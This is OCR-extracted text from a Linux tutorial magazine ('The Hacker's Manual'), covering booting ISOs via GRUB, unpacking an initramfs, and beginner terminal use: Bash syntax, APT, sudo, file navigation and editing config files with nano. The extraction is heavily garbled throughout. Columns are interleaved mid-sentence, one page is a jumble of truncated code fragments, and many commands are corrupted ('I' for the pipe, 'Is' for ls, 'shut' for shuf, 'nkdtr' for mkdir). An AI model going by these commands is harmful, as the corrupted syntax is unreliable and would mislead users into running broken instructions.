This is where the magic of loading the live CD's filesystem sufficiently paranoid/cautious. you may in Zetc/grub.d/40_custom. it will be
from the DVD or ISO happens. If you examine this script - prefer to have a rescue CD always added to the end of the menu
you will need a basic understanding of shell scripting here - available. Dropping an ISO into /boot Bautomatically, whenever you run:
you can often see what kernel parameters it is looking for to and adding a suitable menu entry update-grub or grub-mkconfig.
boot from the ISO. To do that you need to unpack the
initramfs file, which is a compressed CPIO archive. First, you much, so you will often find that it works even with a newer
will need to identify the type of compression used with the release of the distro.
file command—never trust a filename extension to give the Because the modified initrd is saved separately from the
right format: ISO image and referenced only from the menu on your USB
$ file /path/to/initramfs.img stick, you can distribute your USB stick without breaking the
Then you can unpack it to the current directory with one rules some distros have about redistributing modified
of the following: versions of their software. You could, for example, create a
$ zcat /path/to/initrd.img I cpio - id multi-distro installer USB stick complete with themed Grub
$ bzcat /path/to/initrd.img I cpio - id menus and themed distro splash screens (these are in the
$ xzcat /path/to/initrd.img I cpio - id initrd too) to hand out at a Linux installfest.
For images compressed with gzip, bzip2 and xz
respectively. You can also modify the initrd by making your More options
changes to the unpacked filesystem and then repacking it by While you are creating the menu, you can add extra kernel
executing this command in the directory to which you options to suit your needs, e.g. the SystemRescueCd boot
unpacked the initrd in the first place: process pauses for you to select a keymap. Adding
$ find . I sudo cpio --create -format='newc'l gzip >../myinitrd. setkmap=uk will skip the pause and load a UK keymap.
img Similarly, you can set the root password with rootpass.
Once you've a custom initramfs. you don't need to modify Other distros have their own options like these, along with the
the original ISO image to use it. Simply put your new initrd on general kernel configuration options that are documented in
your USB stick and reference it from the menu, like this: the Documentation/kernel-parameters.txt in the kernel
linux (loop)/path/to/vmlinuz... source (there's a copy on each LXFDVD). We’ve included a
initrd /distrodir/myinitrd.img number of submenu files on the DVD, just copy the relevant
Alternatively, if you want to boot such a distro that has directory to the root of your USB device and add the ISO image
already appeared on an LXFDVD, you can 'borrow' the file. If there are 64- and 32-bit versions of a distro. we've named
Ixfinitrd file from there. The init process doesn't change the 32-bit version submenu32, rename it accordingly. ■

g Parse command line options


for x in $(cat /proc/cmdline); do
case $x in
init=*)
init=${x#init=)

root=*)
R00T=${x#root=]
if [ -z "${B00T}" ] && [ "SROOT" = "/dev/nfs" ]; then
B00T=nfs
fi

rootflags=‘)
R00TFLAGS="-o ${x#rootflags=}"

rootfstype=*)
ROOTFSTYPE="${x#rootfstype=}"

rootdelay=‘)
ROOTDELAY="${x#rootdelay=}"
case ${R00TDELAY) in
*[![:digit:].]*)
R00TDELAY=

esac

resumedelay=*)
RESUMEDELAY="${x#resumedelay=}"

loop=*)
L00P="${x#loop=}"
- MOST: /Ixfdvd/work/init_________________________________________________________________________________ (78,1) 29%
Press 'Q' to quit, H' for help, and SPACE to scroll.

Examining the init file in the ISO's initrd file can reveal extra options available to the boot menu.

The Hacker's Manual | 123


HACKER'S
MF* MM MM ^MFM*^ MM *M v^BBMMi MM wBk MBB*^
^BM MM MMB

MM MM M M M
M M M
^m ^^k Ik I ^m ^^k
I^A^bI M M MW M M
IM MI M M M M ■
^M
I ^M I m I m M I
nprocessable_er1 ^MMIM rate $ bundle exec rake db:migrate $
mm^^mmb JBMMBB|B Mpp^M|

| M
M MMMMB M MMM JM|^^^^Mf
ite_attributes(params[:task]) format.html M Ms! :oM M M^lse format.html {render action: "edit”} format.json {rei
ec rails generate migration add_priority_to_tasks prioritydnteger $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = py
ars = for i in range(MAX_STARS): star = [randrange(O,639), randrange(0,479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.
numstars = 100; use Time::HiRes qw(usleep); use Curses; $screen = new Curses; noecho; curs_set(0); for (Si = 0; Si < Snumstars ; $i++) {$star_x($i] = rand(80); $s
clear; for ($i = 0; $i < Snumstars ; $i++) {$star_x($i] -= $star_s[$i]; if ($star_x($i] < 0) {$star_x($i] = 80;} $screen->addch($star_y($i], $star_x($i], “.”);} $screen->refre
rent, lest do gem “rspec-rails”, “~> 2.13.0” S gem install bundle: $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond
nl {redirect_to @task, notice: } formatjson {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprc
ity_to_tasks priority:integer $ bundle exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_
jne.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrange(0, 479), randrangefl, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type == pyg
tes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) {$star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i]
s ; $i++) { $star_x($i] -= $star_s[$i]; if ($star_x($i] < 0) { $star_x[$i] = 80;} Sscreen->addch($star_y[$i], $star_x($i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @task.update_
’) format.json {head :no_content} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake db:migrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in tt
rgame from random import randrange MAX.STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = :
s(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $nt
; new Curses; noecho: curs_set(0); for ($i = 0; $i < $numstars ; $i++) { $star_x($i] = rand(80); $star_y[$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { Sscreen-
]; if ($star_x[$i] < 0) { $star_x($i] = 80;} $screen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :de\
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist --skip-test-unit respond_to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit”} format.json {render json: @task.errors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db:migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAXJSTARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAX_STARS): star =
=nd(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl $numstars = 100; use Time::HiRes qw(us
($i = 0; $i < Snumstars ; $i++) { $star_x[$i] = rand(80); $star_y{$i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for ($i = 0; $i < Snumstars ; $i++)
reen->addch($star_y]Si], $star_x[$i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, lest do gem “rspec-rails”, “~> 2.13.0
The terminal
Feel like a 1337 hacker and get to
grips with the powerful terminal.
126 Get started
The best way to use the terminal is to dive
in with both feet and start using it.

128 Files and folders


We explain how you can navigate the file
system and start manipulating things.

130 Edit config files


Discover how you can edit configuration
files from within the text terminal.

132 System information


Interrogate the local system to discover all
of its dirty little secrets.

134 Drive partitions


Control, edit and create hard drive
partitions and permissions.

136 Remote access


Set up and access remote GUI
applications using Xll

138 Display control


Sticking with the world of Xll we take
some randr for resolution control.

140 Core commands


20 essential terminal commands that all
Linux web server admins should know.

loyracer , ~> u.11.4 group ;aeveiopmeni, :iesi ao gem,


attributes(params[:task]) format.html {redirect_to ©task,
generate migration add_priority_to_tasks priorityinteger
le past!’) if due_at < Time.zone.now #!/usr/bin/en python
for i in range(MAX_STARS); star = [randrangefO, 639),
imstars = 100; use Time::HiRes qw(usleep); use Curses;
>clear; for ($i = 0; $i < $numstars ; $i++) { $star_x[$i] -J
relopment, lest do gem “rspec-rails”, “~> 2.13.0” $ gem
t.html {redirect_to @task, notice: *...’} format.json {head
y_to_tasks priority:integer $ bundle exec rake db:migrate
e.now #!/usr/bin/en python import pygame from random
: [randrangefO, 639), randrangefO, 479), randrangefl, 16)]
deep); use Curses; Sscreen = new Curses; noecho; curs_ The Hacker's Manual | 125
{$star_x[$i] -= $star_s[$i]; if f$star_x[$i] < 0) { $star_x[$i]
” $ gem install bundler $ gem install rails -version=3.2.12l
The terminal

Terminal: How
to get started
It's time to flex your fingers and dive head first into the inky darkness of the
terminal to see how you can start handling the commands.

he terminal is an incredibly important part of your emulator - technically it’s emulating a TeleTYpe (TTY)

If you're struggling
to type the right
T Linux desktop. It doesn't matter how wedded you are
to point and click over the command line, at some
session. It has all the functionality you'll need, but both XTerm
and UXTerm are worth noting because although they are
point you're going to have to dip your toe in the terminal's more minimalist tools and neither require any dependencies
dark expanse and use it. Don't worry, though, because the to run. This means if anything stops the main terminal from
command,you can
terminal isn't as scary as it might appear, and if you take the running, you can use either as a backup. As an aside, the only
wipe all previous
time to learn the basics you'll discover it can be a far quicker difference between the two is that UXTerm supports the
actions from view
simply by typing and more effective way of getting certain tasks done. expanded Unicode character set.
clear and hitting As you'd expect, a terminal effectively gives you access to
Enter. Note this your Linux shell, which means it works in exactly the same How Bash works
won't affect your
way using the same language (Bash). This means you can do The Linux shell uses the Bash shell and command language
command history.
anything in the terminal you'd normally do at the command to perform tasks, and it uses a relatively straightforward
line, all without leaving the relative comfort of your desktop. syntax for each command: utility command -option .
That makes learning how to use the terminal - and Bash - The 'utility' portion of the command is the tool you wish to
doubly advantageous as it gives you your first glimpse into run, such as Is for listing the contents of a directory, or apt-
working with the underlying Linux shell. And over the next few get to trigger the APT package management tool. The
articles that's exactly what you’re going to learn - how to get command section is where you specify exactly what you
to grips with the terminal. want the utility to do, eg typing apt-get install instructs the
We're basing this tutorial on Ubuntu, so start by opening package management utility to install the named package, eg:
the Dash and typing 'terminal' into the search box. You'll find apt-get install vic.
the terminal of course, but you'll also see two entries called The -option section is where one or more ‘flags' can be
UXTerm and XTerm too. This highlights the fact there are set to specify certain preferences. Each flag is preceded by
multiple terminal emulators that you can run in order to
interact with the shell. There are differences between them, of
course, but fundamentally they do the same thing. Speed up text entry
For the purposes of this tutorial we're sticking with the
default terminal, which is basically the gnome-terminal It doesn't matter how fleet of hand your typing skills are. the
command line can still be a time-consuming, frustrating
experience. Thankfully the terminal comes equipped with
lots of handy time-saving shortcuts. This issue let's take a
look at how you can easily access previously used
commands and view suggestions:
» Up/down arrows Browse your command history.
» history Use this to view your command history
» Ctrl+r Search command history. Type letters to narrow
down search, with the most recent match displayed, and
keep pressing Ctrl+r to view other matches.
» Tab View suggestions or auto-complete a word or path if
only one suggestion exists. Press ~+Tab to autofill your
username, @+Tab to autofill your host name and $+Tab to
> The -help flag can be used with any command to find
autofill a variable.
out what it does, plus what arguments to use.

126 | The Hacker's Manual


Get started

Your first terminal commands


While it's possible to install and manage software using a
combination of the Software Center and Ubuntu's Software
& Updates setting panel, it's often quicker to make use of the O® nlck^nlck-ubuntu: -
Advanced Package Tool (APT) family of tools. Here's some ntck@ni.ck-ubuntu:~$ apt-cache show vic
Package: vic
key ways that they can be used (see sudo use below): Priority: optional
Section: unlverse/graphlcs
» S apt-cache pkgnames Lists all available packages from Installed-Slze; 3765
sources listed in the /etc/apt/sources.list file. Maintainer: Ubuntu Developers <ubuntu-devel-dlscuss@llsts.ubuntu.con>
Orlglnal-Malntalner: Debian Multimedia Maintainers <pkg-Multlmedla-nalntalners@llsts.aU0th.deblan.0r5
» S sudo add-apt-repository ppa:<repository name> Adds a >
Architecture: amd64
specific Launchpad PPA repository to the sources list. Version: 2.1.6-8ubuntul4.64.1
Replaces: vlc-data (« 1.1.5), vlc-nox (« 2.0.2)
» S sudo apt-get update Gets the latest package lists Provides: mp3-decoder______________________________________________________________________________________________
praWmt^Mfonts-freefont-ttf . vlc-nox (» 2.1.6-0ubuntul4.04.1), llbaal (>■ 1.4p5), llbc6 (>■ 2.IS), lib
(including updated versions) from all listed repositories. cacao (>= 0.99.betal7-l), Ubfreetype6 (>■ 2.2.1), UbfrlbldlO (>= 0.19.2), Ubgccl (>= 1:4.1.1), llbg
ll-mesa-glx | Ubgll, Itbqtcore4 (>= 4:4.8.0), llbqtgul4 (>= 4:4.8.0), llbsdl-lmagel.2 (>■ 1.2.10), It
» S sudo apt-get install <package> Installs all the named bsdll.2debtan (>= 1.2.11), ltbstdc**6 (>« 4.6), ItbtarO, llbva-xll-1 (» 1.3.0-), Itbval (» 1.3.0-),
Ubvlccore? (>- 2.1.9), Ubxll-6, UbxcbconpostteO, Ubxcbkeysynsl (>= 0.3.9), Ubxcb-randrO (>= 1.1
package. This will also download and install any required ), Ubxcb-shnO, Itbxcb-xvO (>■ 1.2), Ubxcbl (>■ 1.6), ltbxext6, libxtneranal, ltbxpn4, zllblg (>■ 1:1
dependencies for the packages. .2.3.3)____________________________________________ _______ _ ________________________________________________________
Pre-Depends: dpkg (>■ 1.15.6-)
» $ apt-get remove <package> Use this to remove an Reconnends: vlc-plugtn-notlfy (■ 2.1.6-0ubuntul4.04.1), vlc-plugln-pulse (■ 2.1.6-0ubuntul4.04.1), xdg
•utils
installed package. Use apt-get purge <package> to also Suggests: vldeolan-doc
Breaks: vlc-data (« 1.1.5), vlc-nox (« 2.0.2)
remove all its configuration files, and apt-get autoremove to Filename: pool/unlverse/v/vlc/vlc_2.1.6-0ubuntul4.04.1_amd64.deb
size: 1212144
remove packages installed by other packages that are no MDSsum; Fbb2933ada01d9ccddd319ddea21bd09
SHAl: 4bb0e71315956d97cel8b67d7eeb27eelb968fbe
longer needed. SKA2S6: 636992ae393297ddSafdba39b9cb3aO9S8b3dlf246e51a47660CC3fS993ca3Sf
Descrtptlon-en: nulttnedla player and streamer
» $ sudo apt-get upgrade Upgrades all installed software -
run sudo apt-get update before running this. Other useful
apt-get commands include apt-get check a diagnostic tool
that checks for broken dependencies, apt-get autoclean. > The apt-cache package can also be used to search for specific packages or
which removes Deb files from removed packages. reveal a package’s dependencies.

one or two dashes (--) and the most useful of all is the --help sudo group by default. To resolve this, you need to open the
option, which provides a brief description of the utility, plus terminal in an account that does have root access (or use the
lists all available commands and options, eg Is -1. su command if supported) and type sudo adduser
The -1 flag tells the list directory tool to provide detailed <username> sudo . You can also add the user to other groups
information about the contents of the folder it's listing, with the command by listing all the groups you wish to add.
including: permissions: who owns the file: the date it was last eg: sudo adduser <username> adm sudo Ipadmin
modified: and its size in bytes. Utilities can be run without any sambashare .
commands or options - eg Is on its own provides a basic list Another handy tool is gksudo, which allows you to launch
of all folders and files in a directory. You can also run utilities desktop applications with root privileges. It's of most use
with a combination of commands and/or options. when wanting to use the file manager to browse your system
with root access: gksudo nautilus . Make sure you leave the
Restricted access terminal open while the application is running, otherwise it’ll
Open the terminal and you’ll see something like this appear: close when the terminal does. When you're done, close the
username@pc-name:~$ . This indicates that you’re logged on application window, then press Ctrl+c in the terminal, which
to the shell as your own user account. This means that you interrupts the currently running program and returns you to
have access to a limited number of commands - you can run the command line.
Is directly, eg, but not to install a package using apt-get. We've already discussed the -help flag, but there are
because the command in question requires root access. This other help-related tools you can use too. First, there's
is achieved one of two ways - if you’re an administrative user, whatis - which you can type with any command to get a
as the default user in Ubuntu is. then you can precede your brief description of it and any specified elements, eg whatis
command with the sudo command, eg sudo apt-get install apt-get install vic will describe the apt-gettool. the install
vic . You’ll be prompted for your account password, and then argument and what package vic is. Flags are ignored.
the command will run. You should find that you can run more If you're looking for a full-blown manual, then the man tool
sudo -based commands without being re-prompted for your provides access to your distro's online reference manual,
password (for five minutes) while the terminal is open. On which is started with man intro . This provides you with a long
some distros you can log on to the terminal as the root user and detailed intro to the command line. Once done press q to
with su -you'll be prompted for the root password at which quit back to the terminal. For more advice on navigating the
point you'll see the following prompt: root@pc-name:~$ . manual, type man man or pair it with a tool, eg man Is .
Once logged in, you can enter commands with no Now you've taken your first steps into the world of the
restrictions. We recommend you use the sudo command terminal, check out the box (Your First Terminal Commands,
rathe' than this approach and if you’re running Ubuntu then above) for some useful package management commands
you'll find su won't work because the root account password you can work with. Next issue, we'll look at how to navigate
is locked for security reasons. your filesystem from the terminal, plus launch programs and
When installing some distros or adding new users to delve into more useful shortcuts to help speed up the way
Ubuntu, you may find your user account isn't added to the you interact with the command line. ■

The Hacker's Manual | 127


The terminal

Terminal:
Work with files
Turn your attention to navigating the file system and
manipulating files and folders from the beloved Terminal.

n the previous tutorial on page 158 we introduced


O® nlckQnlck-ubuntu: -/Documents

I you to some of the basics of using the Terminal. We


opened by revealing it works in the same way as your
Linux shell; how commands are structured (utility command
-option): plus gave you the tools to manage software
ntckgntck-ubuntu:-$ cd Documents
ntckgntck-ubuntu:-/DocunentsS Is
Doctor Who
ntck@ntck-ubuntu:~/Documents$ rndtr
ntck@ntck-ubuntu:~/Docunents$ Is
Doctor\ Who

packages and get further help. This time, we're going to look ntck@ntck-ubuntu:-/Docunents$ nkdtr Doctor Who
nick(anick-ubuntu:~/Docunents$ Is
at how you can navigate your file system, work with files Doctor Who
and folders and learn some more time-saving shortcuts in nickgnick-ubuntu:~/DocunentsS rndtr Doctor Who
ntck@ntck-ubuntu:-/Docunents$ Is
the bargain. ntckgntck-ubuntu:~/Docunents$ nkdtr 'Doctor who'
When you open a new Terminal window, the command ntckgntck-ubuntu:-/Docunents$ Is
Doctor Who
prompt automatically places you in your own personal home ntckgntck-ubuntu:«/DocumentsS I

folder. You can verify this using the Is command, which lists
the contents of the current folder. The default Terminal > Make good use of * and \ characters when folder paths
application displays folder names in blue, and filenames in contain spaces and other special characters.
white, helping you differentiate between them. The Is
command can be used in other ways too. Start by typing Is -a <subfolder> with the name of the folder you wish to access.
to display all files, including those tha: begin with a period Remember that folder and filenames are case sensitive, so if
mark (.), which are normally hidden from view. Then try Is the folder begins with a capital letter - as your personal
-recursive , the -recursive option basically means that the Documents folder does, eg - you'll get an error about the
contents of sub-folders are also displayed. folder not existing if you type it all in lower case, eg, cd
If you want more detail about the folder's contents - documents . You can also move down several levels at once
permissions settings, user and group owners, plus file size (in using the following syntax: cd subfolder/subfolder2 . To move
bytes) and date last modified, use Is -1. If you'd prefer to list back up to the previous level, use cd... you can also use the
file sizes in kilobytes, megabytes or even gigabytes depending I character to move up multiple levels at once, eg cd.Z.
on their size, add the -h option—so use Ih -h -1 instead. moves up two levels.
There are many more options for Is and you can use the What if you want to go somewhere completely different?
-help option to list them all. Use cd / to place yourself in the root directory, or navigate
Navigating your file system is done using the cd anywhere on your system by entering the exact path,
command - to move down one level to a sub-folder that’s including that preceding I character to indicate you're
inside the current directory use cd <subfolder> , replacing navigating from the top level, eg cd /media/username .

Speedier navigation
In last part we revealed some handy keyboard arguments. command with sudo applied to it. And if you
shortcuts to help you enter commands more » Ctrl+u Clear the entire line to start again. make a typo when entering a command, instead
quickly, but the following keys will help you » Ctrl+k Delete everything from the cursor's of retyping the entire command again, just use the
navigate the Terminal itself more efficiently: position onwards. following syntax to correct the mistyped word (in
» Home/End Press these to jump to the » Ctrl+w Delete the word before the cursor. the following example, dpkg was originally
beginning or end of the current line. Accidentally omitted sudo from your command? mistyped as dkpg):
» Ctrl+left/right cursor Move quickly between Just type sudo I! and hit Enter to repeat the last AdkpgAdpkg

128 | The Hacker's Manual


Files and folders

Boost your learning


Now you’re starting to flex your muscles in nano ~/.bashrc Press Ctrl+o to save the file (just hit Enter to
Terminal, how about expanding your knowledge This opens the file in the nano text editor. Use overwrite it), then Ctrl+x to exit nano. Now close
by instructing it to display information about a the cursor keys to scroll down to the bottom of the Terminal window and open a new one to get a
random command each time you open it? To do the file, then add the following line to it: brief description of a command. Just type the
this, you need to edit a file, so open the Terminal echo “Did you know that:”; whatis $(ls /bin I following, with the actual command listed for a
and type the following: shut -n 1) longer description: <command> -help .
J

The ~ character works in a similar way to / .except this Wildcards are often used to speed things up in searches,
places you in your home directory. So typing cd ~/ and can also be applied to file commands too - the asterisk
Documents is the same as typing cd /home/username/ (*) character can be used to quickly access a folder with a
Documents . One final trick —you've jumped to another long name, eg cd Doc*. This works fine if there's only one Somefilemanagers
directory, but how do you go back to the previous directory folder beginning with Doc, but if there ere two (say Doctor allow you to
right-click a folder
quicky? Simple, just type cd - to do so. and Documents), then the command would open the first
and open the
matching folder, which is Doctor in this instance. To avoid Terminal at that
Working with files and folders this, use cdDoc*ts instead. location, but you
You can now list directories and navigate your file system, Two characters that are more useful when navigating are have to manually
but what about doing something practical, like moving and the single quotation mark (‘) and backslash (\) characters. add this option to
Ubuntu's Nautilus
copying files? You'll find a range of different commands exist, Use single quotation marks around files or file paths that
file manager.
and the tricks you’ve learned about navigation will hold you in contain spaces, such as cd ~\Documents\Doctor Who . Install nautilus­
good stead here too. You should also use quotation marks when creating open-terminal
Let’s start by looking at commands for copying (cp) and foldersinthis way, eg simply typing mkdir Doctor Who will from the Software
Center, then open
moving ( mv) files and folders. The same options apply to actually create two separate folders called Doctor and Who.
a Terminal window,
both commands. The basic syntax is cp/mv <source> so type mkdir‘Doctor Who’ to get the folder you want. type nautilus -q
<target>. The source and target can be complete paths You can also use the \ charactertogetaroundthistoo.eg and press Enter.
following the same rules for the cd command, but it's mkdir Doctor) Who works in the same way. because the \ The option will
generally good practice to first navigate to the folder character instructs mkdir to treat the following character (in now appear.

containing the file or folder you wish to copy or move. Once this instance the space) as 'special'.
done, you can simply specify the file or folder name as the We finish off by revealing some handy characters that
source, like so cp invoice.odt -/Documents/Backup . allow you to run multiple commands on a single line. The &&
This creates a copy of the file with the same name. argument does just that, so you can do the following to
The following copies the file to the specified directory and quickly update your repos and update all available software:
renames it too: cp invoice.odt ~/Documents/Backup/invoice- sudo apt-get update && sudo apt-get upgrade
backup.odt. If you want to create a copy of the file within the && is like the AND command in that the second
same file, simply use cp invoice.odt invoice-backup.odt. command will only be performed if the first completes
Substitute mv for cp in any of the above commands, successfully. If you wanted the second command to only run
and the file is moved, moved and renamed or simply if the first command failed then you'd use II instead. If you
renamed. What happens if there's already a file called want the second command to run after the first regardless of
invoice-backup.odt in existence? It'll be overwritten without what happens, then use the ; eg.
as much as a by your leave, so make sure you're asked if you sudo apt-get update; sudo apt-get remove appname
want to overwrite it by adding the -i flag like this mv-i instead: of && . ■
invoice.odt invoice-backup.odt.
You can also copy folders using the cp or mv media VtrtualBox VMs
Music wget-log
commands. Here, you need to include the recursive option, ntck@nick-ubuntu:~$ is -h -I
total 2.5M
which ensures the folder is copied across with all its contents drwxrwxr-x 2 nick nick 4.OK Feb 15 15:08 deja-dup
and correctly arranged in their original locations relative to drwxr-xr-x 2 nick nick 4.OK Feb 28 17:21 Desktop
drwxrwxr-x 2 nick nick 4.OK Feb 26 17:35 Doctor
the parent folder: cp -r -/Documents /mnt/sdbl/Backup/. drwxr-xr-x 3 nick nick 4.OK Feb 26 17:44 Documents
drwxr-xr-x 4 nick nick 4.OK Feb 27 13:23 Downloads
If the Backup folder exists, then the Documents folder -rw-r--r-- 1 nick nick 8.8K Nov 26 12:51 examples.desktop
drwxr-xr-x 2 root root 4.OK Feb 4 19:49 fedora
will be recreated inside it; if not, then the Backup folder is
-rw-rw-r-- 1 nick nick 446K Jan 20 12:35 linuxdesktops-enlightenment.png
created and the contents of the Documents folder are copied drwxr-xr-x 3 root root 4.OK Feb 4 19:50 media
drwxr-xr-x 2 nick nick 4.OK Nov 26 13:10 Music
into it instead. drwx............ 2 nick nick 4.OK Feb 10 16:43 NoMachine
dfwxr-xr-X 2 nick hick 4.OK Nov 26 13:10 Pictures
Use the rm command to delete a single file, eg rm
Irwxrwxrwx 1 nick nick 36 Dec 10 13:35 PlayOnLinux's virtual drives -> /home/n
invoice.odt. The rmdir command deletes folders, but only ick/.PlayOnLinux//wincprefix/
drwxr-xr-x 2 nick nick 4.OK Nov 26 13:IO Public
empty ones. If you want to delete a folder and all its contents, -rw-rw-r-- 1 nick nick 871K Jan 13 10:22 steamosl.png
drwxr-xr-x 2 nick nick 4.OK Nov 26 13:10 Templates
use the command rm -r foldername . -rw-rw-r-- 1 nick nick 1.1M Dec 24 22:09 tigervncserver_1.6.0-3ubuntul_amd64.deb
You can also create new folders with mkdir command - drwxr-xr-x 2 nick nick 4.OK Nov 26 13:10 Videos
drwxrwxr-x 6 nick nick 4.0K Nov 30 09:43 VtrtualBox VMs
simply type mkdir folder, replacing folder with your chosen -rw-rw-r-- 1 nick nick 3.5K Jan 21 11:39 wget-log
[nick^nick-ubuntu:|__________________________________________________________________
folder name. Use the touch command to create an empty
file, such as touch config.sys . > Use Is to find out more about the files and folders in a current directory.

The Hacker's Manual | 129


The terminal

Terminal:
Edit config files
We demonstrate how the Terminal is the best place to edit your Linux
installation's configuration files and take some control.

he Terminal is one of Linux’s most important tools, editing them is relatively simple and all you need is a suitable

T and however enamoured you are with your desktop's


point-and-click interface, you can't avoid it forever.

Bash and the command line, and having introduced the


text editor and administrator access via the sudo command.
You might wonder why you don't simply use a graphical
This series is designed to ease you gently into the world oftext editor such as Gedit. There's nothing stopping you doing
this, but you’ll need tc launch it with admin privileges. (See
basics of the Terminal in part one while exploring how to use it the box., Run Desktop Applications with Root Privileges).
to navigate (and manage) your file system in part two, we're You don't need to exit the Terminal to edit these files,
going to examine how you can use it to change key system though - you’ll find two command-line text editors come pre­
preferences in our third instalment. installed on most flavours of Linux, such as vi and nano. The
Linux stores system settings in a wide range of most powerful of the two editors is vi, but comes with a
configuration (config) files, which tend to reside in one of two steeper learning curve.
places: global config files that apply to all users are found
inside the /etc/ folder, while user-specific config files usually Understanding configuration files
reside in the user’s own home folder or the hidden /.config/ For the purposes of this tutorial, we're focusing on nano as
folder. Most user-specific files are named with a period (.) it's perfect for editing smaller files, such as configuration files,
mark at the beginning of the file to hice them from view. and keeps things relatively simple. Use sudo nano /path/file
These config files are basically text files, with settings to invoke it, eg: sudo nano /etc/network/interfaces .
recorded in such a way as to make them decipherable when You'll see the Terminal change to the nano interface - with
read through a text editor, although you'll still need to spend the filename and path is listed at the top, and a list of basic
time reading up on specific configuration files to understand commands are shown at the bottom - the *A’ symbol refers to
how to tweak them. Config files are visible as plain text, so the Ctrl key, so to get help, eg press Ctrl+G. Press Ctrl+X to
exit and you'll be prompted to save any changes if you make
them, otherwise youT return to the familiar command line.
Your file’s contents take up the main area of the nano
interface - if a line is too long for the current Terminal window,
you'll see a '$’ symbol appear at its end - use the cursor key
or press End to jump to the end of the line. Better still, resize
the Terminal window to fit the line on-screen.
Navigation is done in the usual way, using cursor keys to
move around your document, while Home and End are handy
shortcuts to the beginning and end of the current line. Press
Page Up and Page Down keys to jump through the document
a page at a time. If you want to go to the bottom of your
document, press Alt+/ and Alt+\ to go back to the top.
If you want to jump to a specific section of the document,
press Ctrl+W to open the search tool, then enter the text
you’re looking for. You’ll often come across multiple matches,
so keep hitting Alt+W to show the next match until you find
> Our text editor of choice for editing configuration files in the Terminal has to what you’re looking for. If you’d like to search backwards,
be the simple and straightforward nano. Yes, we know there are lots of editors. press Alt+B when at the search dialog and you’ll see

130 | The Hacker's Manual


Config files

Run desktop apps with root privileges


One of the big advantages of using the Terminal is sudo to launch Geditand then edit files in your It's a little messy - you'll see the Terminal window
that it gives you the sudo command, which home directory, they'll end up owned by root remains open and 'frozen' - if you press Ctrl+c.
allows you to run programs and access the rather than your own user account. Gedit will close and you'll get back to the
system with root user privileges. If you want to Instead, use the following command to launch command line. The workaround is to open
edit configuration files outside of the command Gedit (or indeed, any graphical application such Terminal again to launch a separate window in its
line using an editor such as Gedit. you'll need to as Nautilus) as the root user: gksu gedit. You'll own process, or if you want to tidy up the screen,
give it root privileges to access certain files. You see a window pop up asking for your user close the existing Terminal window using the 'x'
can technically do this using sudo . but this isn’t password. After this. Gedit will appear as normal, button - select ‘Close Terminal' and despite the
the recommended approach, because if you use except you now have full access to your system. warning. Gedit will remain running.

[Backwards] appear to confirm you'll be searching from the


bottom up rather than the top down. ntckBnick-pc:~$ sudo cp -t /etc/default/grub /etc/default/grub.bak
[sudo] password for nick:
cp: overwrite ’/etc/default/grub.bak*? y
Configuration files vary depending on the file you're nick<nick-pc:~$ [J

planning to edit, but share some characteristics. One of these


©©I ftkkgftkk-pe -
is the use of the '#' key. If a line begins with '#', then that
■ '■ 1111 ii ii —mars . ..............
means the line is ignored by Linux. This is a handy way to • If you change this file, run 'update-grub* afterwards to update
• /boot/grubygrub.cfg.
introduce comments into your configuration files, but also » For full docunentatton of the options tn this file, see:
« info -f grub -n 'Stnple configuration*
can be used to disable commands without deleting them GRU8_DEFAULT."ye$"
GRUB_SAVEDEFAULT."tru«"
(handy for testing purposes). Indeed, some configuration files •CRUB_HIDDEN_TINE0UT»"8"
GRUB_HIDOEN_TIMEOUT_QUIET-’true"
- such as php.ini for PHP scripting - are one long list of GRUBTINEOUT*'10"
GRUB_OISTRI8UTOR=*'lsb_release -I -s 2> /dev/null || echo Debian"
GRU6_CMDLINE_LINUX_DEFAULT»*quiet splash*
commented out commands and you simply remove the '#' GRUB_CM0LINE _LINUX =""

next to those commands you want to enable, tweak them « Uncorvtent to enable BadRAM filtering, modify to suit your needs
• This works with Linux (no patch required) and with any kernel that dbtaihS
» the memory nap information from GRUB (GNU Mach, kernel of FreeBSD ...)
